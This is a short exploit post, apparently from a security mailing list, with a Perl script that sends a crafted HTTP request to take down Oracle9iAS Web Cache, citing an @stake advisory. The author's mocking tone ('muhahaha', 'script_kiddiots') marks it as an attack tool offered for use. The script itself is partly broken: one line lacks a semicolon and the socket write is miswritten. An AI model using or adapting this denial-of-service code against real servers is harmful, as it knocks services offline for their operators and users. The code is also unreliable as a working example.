Oracle9iAS Web Cache Denial of Service exploit in perl, as described in Atstake advisory a102802-1.
b04f91f65d13ef5a37fc7fa56dcbc09b494c14e7d26b988206b52a9aaff32e39
-----BEGIN PGP SIGNED MESSAGE-----
hiya ppl,
I have made a quick script to demonstrate the Oracle DOS described in @stakes advisory:
Oracle9iAS Web Cache Denial of Service
please find the perl script pasted below.
regards:
eip/deadbeat/AnGrY_SQl
p.s. I did have about 10submissions but due to hardware failure and no backup :( I lost most my work, I will go through my h.d with a fine comb see if i can rescue some of it..there's a hell of alot more submissions to come ;)
- -----------------oracle.pl----------------
#!/usr/bin/perl
# Oracle9iAS Web Cache Denial of Service
#Coded by eip/Deadbeat/AnGrY_SQl
#haf fun script_kiddiots..
use IO::Socket;
print "\n Oracle9iAS Web Cache Denial of Service\n";
if (!$ARGV[0]){
die "Usage: perl $0 host \n";
}
$host = $ARGV[0];
print "Ok lets DOS: $host \n";
$exploit = "GET / HTTP/1.0 Host: no-one \x0a\x0d\x0a\x0d";
print $exploit
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"80",
PeerAddr=>"$host",
);
print $sox, $exploit;
print "Done..muhahaha..\n\n";
- ------------------------------------EOF-----------------
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlkEARECABkFAj2+jVESHGRlYWRiZWF0QGh1c2guY29tAAoJEEUUsIhkeIbp5koAn0Gr
aqTkPyPohdu+fRPVjCHiMO4/AJsEvRc09905wdu6kiN7Z5X4/t/f4g==
=VaJ6
-----END PGP SIGNATURE-----